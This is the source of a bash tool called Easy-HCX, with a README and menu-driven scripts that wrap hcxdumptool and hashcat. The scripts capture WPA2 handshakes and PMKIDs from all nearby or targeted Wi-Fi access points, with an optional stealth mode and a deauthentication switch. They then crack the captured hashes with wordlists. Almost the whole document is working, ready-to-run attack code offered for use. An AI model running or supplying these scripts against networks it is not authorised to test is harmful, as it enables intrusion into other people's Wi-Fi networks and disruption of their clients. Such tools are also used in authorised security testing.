├── README.md ├── assets ├── 01_easy-hcx-prep ├── 02_easy-hcx-capture-all ├── 03_easy-hcx-capture-targeted ├── 04_easy-hcx-convert ├── 05_easy-hcx-hashcat ├── 06_easy-hcx-capture-info └── ap-list └── easy-hcx.sh /README.md: -------------------------------------------------------------------------------- 1 | ## Easy-HCX 2 | 3 | Easy-HCX is a menu driven script written around hcxtools, hcxdumptool and hashcat. Its goal is not to automate everything, just to make common tasks easier. 4 | 5 | hcxtools, hcxdumptools and hashcat are very deep programs with tons of options so Easy-HCX only covers some of their basic functions including: 6 | 7 | * preparing your wireless interface for captures 8 | * capturing WPA2 handshakes and/or PMKIDs, optionally without deauthenticating clients for stealth or to avoid disrupting clients 9 | * convert capture files to Hashcat's .hccapx or .16800 formats 10 | * viewing information about capture files 11 | * use hashcat to perform dictionary attacks on .hccapx or .16800 files 12 | 13 | ### Hardware Requirements: 14 | * A wireless interface that supports monitor mode 15 | * A GPU that Hashcat can use 16 | 17 | ### Software Requirements: 18 | * hcxdumptool 19 | * hcxtools 20 | * hashcat 21 | 22 | ### Tested with: 23 | * hcxdumptool 5.1.4 24 | * hcxtools 5.1 25 | * hashcat 5.1.0 26 | * Kali linux 64 bit 27 | 28 | User variables are set in easy-hcx.sh. Make sure you look these over. 29 | 30 | ### Notes: 31 | hcxdumptools' documentation states that it randomizes MAC addresses and handles monitor mode on its own. It also states not to use it on logical interfaces and to leave the physical interface in managed mode. 03_easy-hcx-capture-targeted does manually re-enable monitor mode - this is because after using hcxdumptool to get a list of APs, I found that running hcxdumptool again immediately afterwards would fail inconsistently with error messages saying the interface was busy. 32 | 33 | ### Link to demo video 34 | [![Demo Video](http://i3.ytimg.com/vi/zJHD1ttgaxw/hqdefault.jpg)](https://youtu.be/zJHD1ttgaxw) 35 | 36 | -------------------------------------------------------------------------------- /assets/01_easy-hcx-prep: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Argument from easy-hcx 4 | nic=$1 5 | 6 | #Text coloring 7 | yellow='\033[1;33m' 8 | nc='\033[0m' 9 | 10 | echo 11 | echo -e "${yellow}Stopping network-manager service...${nc}" 12 | service network-manager stop 13 | 14 | echo 15 | echo -e "${yellow}Killing wpa_supplicant process...${nc}" 16 | pkill wpa_supplicant 17 | 18 | echo 19 | echo -e "${yellow}Killing dhclient process...${nc}" 20 | pkill dhclient 21 | 22 | echo 23 | echo -e "${yellow}Done${nc}" 24 | 25 | echo 26 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 27 | 28 | -------------------------------------------------------------------------------- /assets/02_easy-hcx-capture-all: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Arguments from easy-hcx 4 | nic=$1 5 | save=$2 6 | status=$3 7 | channel=$4 8 | deauth=$5 9 | 10 | # Text coloring 11 | yellow='\033[1;33m' 12 | nc='\033[0m' 13 | 14 | echo 15 | echo -e "${yellow}This captures WPA handshakes and PMKIDs from all APs${nc}" 16 | 17 | echo 18 | echo -e "${yellow}Enter output name - a folder will be created in "$save" and a capture file inside with this name (.pcapng extension assumed): ${nc}" 19 | read file 20 | 21 | echo 22 | echo -e "${yellow}Creating $save/$file${nc}" 23 | mkdir -p $save/$file 24 | 25 | echo 26 | echo -e "${yellow}Running hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status -c $channel $deauth${nc}" 27 | echo 28 | echo -e "${yellow}Press Control-C when you've gotten enough.${nc}" 29 | hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status -c $channel $deauth 30 | 31 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 32 | -------------------------------------------------------------------------------- /assets/03_easy-hcx-capture-targeted: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Arguments from easy-hcx 4 | nic=$1 5 | save=$2 6 | channel=$3 7 | status=$4 8 | deauth=$5 9 | 10 | # Text coloring 11 | yellow='\033[1;33m' 12 | nc='\033[0m' 13 | 14 | echo 15 | echo -e "${yellow}This captures WPA handshakes and PMKIDs from a single AP${nc}" 16 | 17 | echo 18 | echo -e "${yellow}Enter output name - a folder will be created in "$save" and the capture file inside with this name (.pcapng extension assumed): ${nc}" 19 | read file 20 | 21 | echo 22 | echo -e "${yellow}Creating $save/$file${nc}" 23 | mkdir -p $save/$file 24 | 25 | echo 26 | echo -e "${yellow}Now to get a list of APs. Hit control-c once it scans through all the channels or your target appears then copy the MAC address of the target AP." 27 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 28 | ./assets/ap-list $nic $channel 29 | 30 | echo 31 | echo -e "${yellow}Enter the MAC address of the targeted AP - make sure the AP is in range!${nc}" 32 | read mac 33 | 34 | echo 35 | echo -e "${yellow}Saving target AP's MAC to $save/$file/$file.filter${nc}" 36 | echo $mac>$save/$file/$file.filter 37 | 38 | echo 39 | echo -e "${yellow}Re-enabling monitor mode...${nc}" 40 | ifconfig $nic down 41 | iwconfig $nic mode monitor 42 | ifconfig $nic up 43 | 44 | echo 45 | echo -e "${yellow}Now to capture a handshake or PMKID. Press Control-C when you've gotten enough.${nc}" 46 | 47 | echo 48 | echo -e "${yellow}Running hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status --filtermode=3 --filterlist=$save/$file/$file.filter $deauth${nc}" 49 | hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status --filtermode=3 --filterlist=$save/$file/$file.filter $deauth 50 | 51 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 52 | -------------------------------------------------------------------------------- /assets/04_easy-hcx-convert: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Argument from easy-hcx 4 | save=$1 5 | 6 | # Text coloring 7 | yellow='\033[1;33m' 8 | red='\033[1;91m' 9 | nc='\033[0m' 10 | 11 | echo 12 | echo -e "${yellow}This converts a pcapng file to a .16800 file and/or .hccapx file for hashcat.${nc}" 13 | echo -e "${yellow}A .hccapx file will be created if WPA captures are available and a .16800 file if PMKIDs were captured${nc}" 14 | 15 | echo 16 | echo -e "${yellow}Contents of $save${nc}" 17 | ls --color=auto $save 18 | echo 19 | 20 | echo -e "${yellow}Enter a directory to see the contents: ${nc}" 21 | while : 22 | do 23 | read dir; 24 | 25 | if [ ! -d $save/$dir ] 26 | then 27 | echo 28 | echo -e "${red}Directory does not exist. Please try again.${nc}" 29 | echo 30 | echo -e "${yellow}Enter a directory to see the contents: ${nc}" 31 | else 32 | echo 33 | echo -e "${yellow}Contents of $save/$dir${nc}" 34 | ls $save/$dir 35 | echo 36 | 37 | cd $save/$dir 38 | 39 | echo -e "${yellow}Enter the pcapng filename: ${nc}" 40 | while : 41 | do 42 | read file; 43 | if [ ! -f $file ]; 44 | then 45 | echo 46 | echo -e "${red}File does not exist. Try again.${nc}" 47 | echo -e "${yellow}Enter the pcapng filename: ${nc}" 48 | else 49 | echo 50 | base=$(echo $file | cut -d "." -f 1) 51 | echo $base 52 | echo -e "${yellow}Converting pcapng to hccapx and 16800: Running hcxpcaptool -z $base.16800 -o $base.hccapx $file${nc}" 53 | hcxpcaptool -z $base.16800 -o $base.hccapx $file 54 | 55 | echo 56 | echo -e "${yellow}Checking $base.hccapx for handshakes captured${nc}" 57 | echo 58 | wlanhcxinfo -i $base.hccapx -a -e 59 | 60 | echo 61 | if [ -e $file.16800 ] 62 | then 63 | echo -e "${yellow}Checking $base.16800 file for PMKIDs captured${nc}" 64 | echo 65 | awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }' $base.16800 66 | echo 67 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 68 | exit 1 69 | else 70 | echo -e "${red}No PMKIDs captured${nc}" 71 | echo 72 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 73 | exit 1 74 | fi 75 | fi 76 | done 77 | fi 78 | done 79 | 80 | -------------------------------------------------------------------------------- /assets/05_easy-hcx-hashcat: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Arguments from easy-hcx 4 | save=$1 5 | wordlist=$2 6 | 7 | # Text coloring 8 | yellow='\033[1;33m' 9 | red='\033[1;91m' 10 | nc='\033[0m' 11 | 12 | echo 13 | echo -e "${yellow}This uses hashcat to crack either a WPA capture or a PMKID capture file${nc}" 14 | echo 15 | 16 | echo -e "${yellow}Contents of $save${nc}" 17 | ls --color=auto $save 18 | echo 19 | 20 | echo -e "${yellow}Choose a directory to see its contents: ${nc}" 21 | while : 22 | do 23 | read dir; 24 | if [ ! -d $save/$dir ] 25 | then 26 | echo 27 | echo -e "${red}Directory does not exist. Please try again.${nc}" 28 | echo 29 | echo -e "${yellow}Enter a directory to see the contents: ${nc}" 30 | else 31 | echo 32 | echo -e "${yellow}Contents of $save/$dir${nc}" 33 | ls $save/$dir 34 | cd $save/$dir 35 | 36 | echo 37 | echo -e "${yellow}Enter the filename with .16800 or .hccapx extension to crack: ${nc}" 38 | while : 39 | do 40 | read file 41 | echo 42 | if [ ! -f $file ]; 43 | then 44 | echo -e "${red}File does not exist. Try again.${nc}" 45 | echo -e "${yellow}Enter the filename with extension to crack: ${nc}" 46 | else 47 | # Determine extension of file 48 | filename=$(basename -- "$file") 49 | extension="${filename##*.}" 50 | 51 | if [ "$extension" != "16800" ] && [ "$extension" != "hccapx" ] 52 | then 53 | echo -e "${red}Invalid file extension. Must be a 16800 or hccapx file.${nc}" 54 | echo 55 | echo -e "${yellow}Enter the filename with extension to crack: ${nc}" 56 | else 57 | echo -e "${yellow}Contents of $wordlist${nc}" 58 | ls $wordlist 59 | echo 60 | echo -e "${yellow}Enter the wordlist to use. Entering nothing will use all files in $wordlist: ${nc}" 61 | read list 62 | 63 | if [ "$extension" = "16800" ] 64 | then 65 | echo 66 | echo -e "${yellow}Running hashcat -m 16800 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list{$nc}" 67 | echo 68 | cmd="hashcat -m 16800 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/" 69 | hashcat -m 16800 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list 70 | elif [ "$extension" = "hccapx" ] 71 | then 72 | echo 73 | echo -e "${yellow}Running hashcat -m 2500 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list${nc}" 74 | echo 75 | cmd="hashcat -m 2500 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/" 76 | hashcat -m 2500 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list 77 | fi 78 | echo 79 | echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist: ${nc}" 80 | echo 81 | 82 | while read list2;do 83 | if [ "$list2" = "q" ] 84 | then 85 | echo 86 | echo -e "${yellow}If a password was found, it has been saved to $save/$dir/$dir.cracked. You can also view it with 'hashcat -m 2500/16800 --show'${nc}" 87 | echo 88 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 89 | exit; 90 | elif [ "$list2" = "ls" ] 91 | then 92 | echo 93 | echo -e "${yellow}Contents of $wordlist${nc}" 94 | ls $wordlist 95 | echo 96 | echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist: ${nc}" 97 | echo 98 | else 99 | echo 100 | echo -e "${yellow}Running $cmd$list2${nc}" 101 | echo 102 | $(echo "$cmd$list2") 103 | echo 104 | echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist ${nc}" 105 | echo 106 | fi 107 | done 108 | 109 | fi 110 | fi 111 | done 112 | fi 113 | done 114 | -------------------------------------------------------------------------------- /assets/06_easy-hcx-capture-info: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Argument from easy-hcx 4 | save=$1 5 | 6 | # Text coloring 7 | yellow='\033[1;33m' 8 | red='\033[1;91m' 9 | nc='\033[0m' 10 | 11 | echo 12 | echo -e "${yellow}This shows handshakes captured in a .hccapx file or PMKIDs captured in a .16800 file${nc}" 13 | 14 | echo 15 | echo -e "${yellow}Contents of $save${nc}" 16 | ls --color=auto $save 17 | 18 | echo 19 | echo -e "${yellow}Enter a directory to see the contents: ${nc}" 20 | while : 21 | do 22 | read dir 23 | 24 | if [ ! -d $save/$dir ] 25 | then 26 | echo 27 | echo -e "${red}Directory does not exist. Please try again.${nc}" 28 | echo 29 | echo -e "${yellow}Enter a directory to see the contents: ${nc}" 30 | else 31 | 32 | echo 33 | echo -e "${yellow}Contents of $save/$dir${nc}" 34 | ls $save/$dir 35 | 36 | echo 37 | echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}" 38 | while : 39 | do 40 | read file 41 | cd $save/$dir 42 | if [ ! -f $file ]; 43 | then 44 | echo -e "${red}File does not exist. Try again.${nc}" 45 | echo 46 | echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}" 47 | else 48 | 49 | # Determine extension of file 50 | filename=$(basename -- "$file") 51 | extension="${filename##*.}" 52 | 53 | if [ "$extension" != "16800" ] && [ "$extension" != "hccapx" ] 54 | then 55 | echo 56 | echo -e "${red}Invalid file extension. Must be a 16800 or hccapx file.${nc}" 57 | echo 58 | echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}" 59 | elif [ "$extension" = "hccapx" ] 60 | then 61 | echo 62 | echo -e "${yellow}Checking $file for handshakes captured${nc}" 63 | wlanhcxinfo -i $file -a -e 64 | echo 65 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 66 | exit 1 67 | else [ "$extension" = "16800" ] 68 | echo 69 | echo -e "${yellow}Checking $file for PMKIDs captured${nc}" 70 | awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }' $file 71 | echo 72 | read -p $'\e[91m'"Press enter to continue"$'\e[0m' 73 | exit 1 74 | fi 75 | fi 76 | done 77 | fi 78 | done 79 | -------------------------------------------------------------------------------- /assets/ap-list: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | nic=$1 4 | channel=$2 5 | 6 | # Text coloring 7 | yellow='\033[1;33m' 8 | red='\033[1;91m' 9 | nc='\033[0m' 10 | 11 | echo 12 | echo -e "${yellow}This will list available wifi networks. Copy the MAC address of the target AP and control-C when done${nc}" 13 | 14 | echo 15 | echo -e "${yellow}Running hcxdumptool -i $nic --do_rcascan -c $channel${nc}" 16 | 17 | hcxdumptool -i $nic --do_rcascan -c $channel 18 | 19 | -------------------------------------------------------------------------------- /easy-hcx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Website: https://t3chnocat.com 3 | 4 | # Text coloring 5 | yellow='\033[1;33m' 6 | red='\033[1;91m' 7 | nc='\033[0m' 8 | 9 | ##### User variables start ##### 10 | 11 | # Change this to your wireless interface name 12 | nic=wlan1 13 | 14 | # Change this to the directory you want to save captures to 15 | save=/root/wpa-captures 16 | 17 | # Change this to your wordlist folder 18 | wordlist=/usr/share/wordlists 19 | 20 | # Wifi channels to be scanned - default is all 21 | channel=1,2,3,4,5,6,7,8,9,10,11,12,13,14,36,38,40,42,44,46,48,52,54,56,58,60,62,64,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,132,134,136,138,140,149,151,153,155,157,159,161 22 | 23 | # Verbosity of status while capturing. 1=EAPOL, 2=PROBEREQUEST/PROBERESPONSE, 4=AUTHENTICATION, 8=ASSOCIATION. This is a bitmasked so to set to 15(1+2+4+8) to see all 24 | status=1 25 | 26 | # Comment this to enable deauthentication of clients. WARNING: THIS CAN BE DISRUPTIVE 27 | deauth=--disable_deauthentications 28 | 29 | ##### User variables end ##### 30 | 31 | while : 32 | do 33 | 34 | clear 35 | 36 | echo 37 | echo -e "${yellow} _____ _ ______ __ _ _ ______ __ ${nc}" 38 | echo -e "${yellow}| ____| / \ / ___\ \ / / | | | |/ ___\ \/ / ${nc}" 39 | echo -e "${yellow}| _| / _ \ \___ \\ V _____| |_| | | \ / ${nc}" 40 | echo -e "${yellow}| |___ / ___ \ ___) || |_____| _ | |___ / \ ${nc}" 41 | echo -e "${yellow}|_____/_/ \_|____/ |_| |_| |_|\____/_/\_\ ${nc}" 42 | echo 43 | echo -e "${red} -Written by t3chnocat-${nc}" 44 | echo 45 | echo "1. Prepare the wifi adapter" 46 | echo "2. Capture all the things!" 47 | echo "3. Targeted capture" 48 | echo "4. Convert capture files for Hashcat" 49 | echo "5. Crack files with Hashcat" 50 | echo "6. View handshakes/PMKIDs from capture file" 51 | echo 52 | echo 53 | echo "Any other key to exit." 54 | 55 | echo 56 | read -p $'\e[91m'"Enter the number of the action you want: "$'\e[0m' action 57 | 58 | if [ "$action" = "1" ] 59 | then 60 | ./assets/01_easy-hcx-prep $nic 61 | elif [ "$action" = "2" ] 62 | then 63 | ./assets/02_easy-hcx-capture-all $nic $save $status $channel $deauth 64 | elif [ "$action" = "3" ] 65 | then 66 | ./assets/03_easy-hcx-capture-targeted $nic $save $channel $status $deauth 67 | elif [ "$action" = "4" ] 68 | then 69 | ./assets/04_easy-hcx-convert $save 70 | elif [ "$action" = "5" ] 71 | then 72 | ./assets/05_easy-hcx-hashcat $save $wordlist 73 | elif [ "$action" = "6" ] 74 | then 75 | ./assets/06_easy-hcx-capture-info $save 76 | else 77 | exit; 78 | fi 79 | done 80 | --------------------------------------------------------------------------------